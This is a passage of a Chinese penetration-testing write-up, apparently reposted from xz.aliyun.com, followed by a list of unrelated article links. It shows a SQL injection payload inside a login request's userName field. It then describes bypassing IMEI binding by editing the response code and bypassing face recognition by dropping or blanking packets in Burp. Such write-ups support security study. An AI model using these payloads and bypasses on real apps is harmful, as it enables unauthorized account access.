文章插图
根据登录返回结果,重新测试payload,最终结果如下
明文:{"userName":"TEST'union/**/select/**/<staffId>,'Qwe123@@@','<userName>','Qwe123@@@','<mobile>','<mobile>','<email>','865166023309431',<staffId> from dual -- ","passWord":"Qwe123@@@","osType":"android","osVersion":"5.1.1","appVersion":"20.06.04","loginType":"1","model":"V1938T","brand":"vivo","imei":"865166023309431","version":"new"}密文:xxxxxxxxx结果:提示登录成功
文章插图
仔细看返回的登录数据,已经正常了
文章插图
然后重新替换数据包登录,提示绑定IMEI
文章插图
这个绕过很简单,随便输入验证码,替换返回包,把resultCode从1001改为1000就行(常规操作)
文章插图
文章插图
最终还要个人脸认证
文章插图
先用自己的脸检测,这时候手机会向服务器发包,burp把手机发向服务器的包直接丢掉就可以绕过
文章插图
点击确定后,还有一个大数据包发向服务器,这里面包含的是人脸数据
文章插图
修改数据包,将其中的人脸数据替换为空,然后发送
文章插图
文章插图
最终的最终,成功登录APP
文章插图
文章插图
----------------
【App渗透 - 从SQL注入到人脸识别登录绕过】转载于https://xz.aliyun.com/t/8308
推荐阅读
- 再谈领域驱动设计
- 柴犬是狗吗 柴犬是性格最像人的狗
- 全国唯一的香猪保种基地在哪里?
- 相互宝怎么退出?
- 教你太极拳推手的5个姿势
- 360能借钱吗 360从哪里借钱
- 从AI香水到AI美妆 算法能否求出审美最优解?
- webpack教程:如何从头开始设置 webpack 5
- Redis精华所在,一口气说完Redis的主从复制和哨兵模式
- App开发之客户端框架搭建